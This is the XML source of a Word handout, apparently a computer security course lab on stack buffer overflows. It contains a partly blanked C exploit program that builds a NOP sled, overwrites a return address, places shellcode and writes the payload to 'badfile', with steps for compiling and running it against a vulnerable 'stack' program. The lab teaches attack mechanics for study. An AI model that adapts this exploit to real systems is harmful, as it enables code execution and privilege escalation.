                          <w:p w14:paraId="3DAB5DA5" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                            <w:pPr>
                              <w:spacing w:after="120"/>
                              <w:ind w:firstLine="45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 xml:space="preserve">  fclose(badfile);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29951A67" w14:textId="71A39702" w:rsidR="00800611" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                            <w:pPr>
                              <w:spacing w:after="120"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AF59EE">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text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F4F183" id="Rectangle 2" o:spid="_x0000_s1027" style="width:432.35pt;height:46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" filled="f" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="7CCFAFBB" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                      <w:pPr>
                        <w:spacing w:after="12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>void main(int argc, char **argv)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46958D4C" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                      <w:pPr>
                        <w:spacing w:after="12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>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="725A79E4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char buffer[200];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="57C27B23" w14:textId="6B2D4DC0" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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FILE *badfile;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AFACD2C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/* A. Initialize buffer with </w:t>
                      </w:r>
                      <w:r w:rsidRPr="002235D5">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t xml:space="preserve">0x90 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AF59EE">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>(NOP instruction) */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="61A2172A" w14:textId="7972D950" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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memset(&amp;buffer, </w:t>
                      </w:r>
                      <w:r w:rsidRPr="002235D5">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>0x90</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AF59EE">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>, 200);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="225F9095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/* B. Fill the return address field with a candidate </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="473A744D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      entry point of the malicious code */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="344E30B3" w14:textId="1EF3FDF5" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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*((long *) (buffer + </w:t>
                      </w:r>
                      <w:r w:rsidR="002235D5">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>______</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AF59EE">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t xml:space="preserve">)) = </w:t>
                      </w:r>
                      <w:r w:rsidR="00821970" w:rsidRPr="00821970">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>0xffffcf48</w:t>
                      </w:r>
                      <w:r w:rsidR="00821970">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="002235D5">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> __________</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AF59EE">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36AF074A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// C. Place the shellcode towards the end of buffer</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E0CFCAB" w14:textId="374D3CCB" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3346019E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/* Save the contents to the file "badfile" */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1FB8C78B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badfile = fopen("./badfile", "w");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0ECBDB5E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fwrite(buffer, 200, 1, badfile);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3DAB5DA5" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                      <w:pPr>
                        <w:spacing w:after="120"/>
                        <w:ind w:firstLine="45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 xml:space="preserve">  fclose(badfile);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="29951A67" w14:textId="71A39702" w:rsidR="00800611" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                      <w:pPr>
                        <w:spacing w:after="120"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AF59EE">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1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35A962" w14:textId="0F6FF1D9" w:rsidR="00800611" w:rsidRDefault="00800611" w:rsidP="00800611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run exploit program</w:t>
      </w:r>
      <w:r w:rsidR="003911C9">
        <w:t xml:space="preserve"> and then stack program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02AA24" w14:textId="551AAAE3" w:rsidR="00800611" w:rsidRDefault="003911C9" w:rsidP="00800611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$ gcc -o  exploit exploit.c -m32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BABF4" w14:textId="1F638AAE" w:rsidR="003911C9" w:rsidRDefault="003911C9" w:rsidP="00800611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F12C48" w14:textId="4AD38DDF" w:rsidR="00800611" w:rsidRDefault="003911C9" w:rsidP="003911C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$ stack</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0080061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9462" w14:textId="77777777" w:rsidR="0046393C" w:rsidRDefault="0046393C" w:rsidP="00914334">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3479CC3C" w14:textId="77777777" w:rsidR="0046393C" w:rsidRDefault="0046393C" w:rsidP="00914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4628" w14:textId="77777777" w:rsidR="0046393C" w:rsidRDefault="0046393C" w:rsidP="00914334">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37E27E5E" w14:textId="77777777" w:rsidR="0046393C" w:rsidRDefault="0046393C" w:rsidP="00914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3E641" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="00914334">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>CS</w:t>
    </w:r>
    <w:r w:rsidR="00962BCD">
      <w:t>445</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00962BCD">
      <w:t>Computer Security</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7915023C" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="009143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A48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="856E5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46F87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3556B074"/>
    <w:lvl w:ilvl="0" w:tplc="99A6182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341BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6922C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369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055956">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="61175766">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="189785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jC1MDI0tTAwMrI0s7BQ0lEKTi0uzszPAykwqgUArqKn6ywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="004326CC"/>
    <w:rsid w:val="00023C55"/>
    <w:rsid w:val="0005590A"/>
    <w:rsid w:val="00075101"/>
    <w:rsid w:val="00103111"/>
    <w:rsid w:val="00103D8F"/>
    <w:rsid w:val="00130A06"/>
    <w:rsid w:val="00135201"/>
    <w:rsid w:val="00215748"/>
    <w:rsid w:val="002235D5"/>
    <w:rsid w:val="0029250F"/>
    <w:rsid w:val="002D0FC9"/>
    <w:rsid w:val="00362992"/>
    <w:rsid w:val="0037607E"/>
    <w:rsid w:val="003911C9"/>
    <w:rsid w:val="003A2F7C"/>
    <w:rsid w:val="004326CC"/>
    <w:rsid w:val="00462E6D"/>
    <w:rsid w:val="0046393C"/>
    <w:rsid w:val="004A13A2"/>
    <w:rsid w:val="00510D16"/>
    <w:rsid w:val="0051708B"/>
    <w:rsid w:val="00576F23"/>
    <w:rsid w:val="005B1174"/>
    <w:rsid w:val="005B3C59"/>
    <w:rsid w:val="005D0D3F"/>
    <w:rsid w:val="005F7449"/>
    <w:rsid w:val="00600BB4"/>
    <w:rsid w:val="00684AA1"/>
    <w:rsid w:val="00702BFE"/>
    <w:rsid w:val="00746EC3"/>
    <w:rsid w:val="007656AD"/>
    <w:rsid w:val="007762D6"/>
    <w:rsid w:val="0078493B"/>
    <w:rsid w:val="007C7D86"/>
    <w:rsid w:val="007D0C7A"/>
    <w:rsid w:val="007D2172"/>
    <w:rsid w:val="007F720C"/>
    <w:rsid w:val="00800611"/>
    <w:rsid w:val="0080478F"/>
    <w:rsid w:val="00821970"/>
    <w:rsid w:val="00873E1A"/>
    <w:rsid w:val="008C0714"/>
    <w:rsid w:val="008F16AE"/>
    <w:rsid w:val="00911698"/>
    <w:rsid w:val="00914334"/>
    <w:rsid w:val="00962BCD"/>
    <w:rsid w:val="00973225"/>
    <w:rsid w:val="009919B0"/>
    <w:rsid w:val="00A3036E"/>
    <w:rsid w:val="00A75A30"/>
    <w:rsid w:val="00AE0ADB"/>
    <w:rsid w:val="00AF59EE"/>
    <w:rsid w:val="00B02C68"/>
    <w:rsid w:val="00B07BB1"/>
    <w:rsid w:val="00B435BF"/>
    <w:rsid w:val="00B74593"/>
    <w:rsid w:val="00C17D28"/>
    <w:rsid w:val="00C66ADD"/>
    <w:rsid w:val="00C846C5"/>
    <w:rsid w:val="00CD7785"/>
    <w:rsid w:val="00CE489D"/>
    <w:rsid w:val="00CF07A2"/>
    <w:rsid w:val="00D377B3"/>
    <w:rsid w:val="00D659A2"/>
    <w:rsid w:val="00D80780"/>
    <w:rsid w:val="00DC632D"/>
    <w:rsid w:val="00EB7E39"/>
    <w:rsid w:val="00ED47DA"/>
    <w:rsid w:val="00EE566B"/>
    <w:rsid w:val="00F32DD4"/>
    <w:rsid w:val="00F5039B"/>
    <w:rsid w:val="00F72A1A"/>
    <w:rsid w:val="00F77581"/>
    <w:rsid w:val="00FB4B4D"/>
    <w:rsid w:val="00FE453F"/>
    <w:rsid w:val="00FE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03DD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{243CB3DB-5BEB-4904-BF97-43EDFAEE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4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334"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00914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334"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00914334"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00576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0A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University-Purdue University Fort Wayne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Zesheng Chen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Haytham Idriss</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-09T07:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-09T07:16:00Z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3e5fb428-e567-40ff-bfeb-d40adf6da020</vt:lpwstr>
  </property>
</Properties>
</file>